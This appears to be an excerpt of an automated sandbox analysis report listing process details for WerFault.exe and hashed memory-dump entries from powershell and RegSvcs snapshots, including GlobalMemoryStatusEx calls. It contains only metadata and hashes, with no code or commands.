                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                        Target ID:11
                                        Start time:04:37:43
                                        Start date:26/01/2025
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 880
                                        Imagebase:0x590000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                        Executed Functions

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406610196.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff849000000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1694cd04b55a3c645837493ec108ab761839ccb8b3f48b0161491bd36278cb79
                                        • Instruction ID: 23d478ea69635a76cf917d25c46fbcc22d9003dee7a8bffe0da4a2f62f269ac6
                                        • Opcode Fuzzy Hash: 1694cd04b55a3c645837493ec108ab761839ccb8b3f48b0161491bd36278cb79
                                        • Instruction Fuzzy Hash: FEE21531E0DBC94FEBA6AF2868555B57FE1EF56254B0801FBD04DC7193EA18AC06C392
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406111931.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f96ea6287c42c0ac51f0a8fce4a632221cff249f02aa90f17881d32513b9eb32
                                        • Instruction ID: a66488df16d0694401b7cc63625c3fdeb18fca6013c03a40820afd3d73a9bbe1
                                        • Opcode Fuzzy Hash: f96ea6287c42c0ac51f0a8fce4a632221cff249f02aa90f17881d32513b9eb32
                                        • Instruction Fuzzy Hash: 5A315930A08A0D8FDB98EF58C4446EE73F2FF98351F10457AE40AE7294CB39A855CB84
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406610196.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff849000000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e51837b7727b7fd963c900b9b47a5e8c357caebd6cf62019112d63fa93630f60
                                        • Instruction ID: c35af12eaf732f9265b1527afffba5f0350b48643753d14465cb87ba3e105ac7
                                        • Opcode Fuzzy Hash: e51837b7727b7fd963c900b9b47a5e8c357caebd6cf62019112d63fa93630f60
                                        • Instruction Fuzzy Hash: 14114C7140E7C98FDB679F3868292A57F70FF17200F0905EAD0C88B4A3DA29A959C752
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406111931.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02dc0a239551e790cadd179bbc4c5da6bf28e212555b5c81e9fce738a600a378
                                        • Instruction ID: e481ed954da1de2d83bd4ddb7cbf2184a100f2a2b4ac9f10e4c7e59c1a83b4d6
                                        • Opcode Fuzzy Hash: 02dc0a239551e790cadd179bbc4c5da6bf28e212555b5c81e9fce738a600a378
                                        • Instruction Fuzzy Hash: AA017171908A4D8FDF85FF28C858AE97BF1FF29301F1545AAD419C72A1DB319954CB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406111931.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                        • Instruction ID: deb923fabd2837f2379e5f9e01aad23e341a67bf454069198374004b12345de3
                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                        • Instruction Fuzzy Hash: 4601677111CB0D4FD744EF0CE451AA6B7E0FB95364F10056EE58AC3695D736E882CB45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406610196.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff849000000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 53e7f383240aecb4d2b624add4ac695d4a3cbe7b025beb72b75eaf71a3dd78f2
                                        • Instruction ID: e221a30144ca6262d4cdd3a7803d91ae831737c82f58d0e3d075794a22b1bb0d
                                        • Opcode Fuzzy Hash: 53e7f383240aecb4d2b624add4ac695d4a3cbe7b025beb72b75eaf71a3dd78f2
                                        • Instruction Fuzzy Hash: A1F0F022F0ED995AFAF9AA2C34096F96BA1DF459A0B0801F6C40DC3143EC089C490381
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2406111931.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7273c6a8cd92f6f03bd7545645f124f6acad126883bf613921f81ce3a7e93f08
                                        • Instruction ID: a77801f8f792ca16da8124b462a75b21df861774dff5a5c97fa1d2725f02f086
                                        • Opcode Fuzzy Hash: 7273c6a8cd92f6f03bd7545645f124f6acad126883bf613921f81ce3a7e93f08
                                        • Instruction Fuzzy Hash: 67F01774D0820B8FCB00EFA8C4855AEB7B0AB25314F204926C115E7290DB38AA508F94

                                        Executed Functions

                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0150811A), ref: 01508207
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4340575754.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_1500000_RegSvcs.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 1a22cd0d54d467d3033cfa2e2375a5cbac422dd348a2586df3b683ac6f592d25
                                        • Instruction ID: 99b139ef10913bf84f41ea67d421abc243c24331f3feb8831c8e5558ce485df2
                                        • Opcode Fuzzy Hash: 1a22cd0d54d467d3033cfa2e2375a5cbac422dd348a2586df3b683ac6f592d25
                                        • Instruction Fuzzy Hash: F31122B1C006599BDB10DF9AC544A9EFBF4BF09210F20816AE818A7241D378A940CFA1
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0150811A), ref: 01508207
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4340575754.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_1500000_RegSvcs.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 39a5631b94970a5854e42845873230fe73b2f8df53cd42351c0cf33f12b4ab85
                                        • Instruction ID: cc703e0d07ec5044d0d2f9b7063c1f7399b887335769dfe5da8d40b0f7140d14
                                        • Opcode Fuzzy Hash: 39a5631b94970a5854e42845873230fe73b2f8df53cd42351c0cf33f12b4ab85
                                        • Instruction Fuzzy Hash: FF1112B1C0065A9FDB10DFAAC544BEEFBF4BF48320F15816AD818A7241D778A940CFA1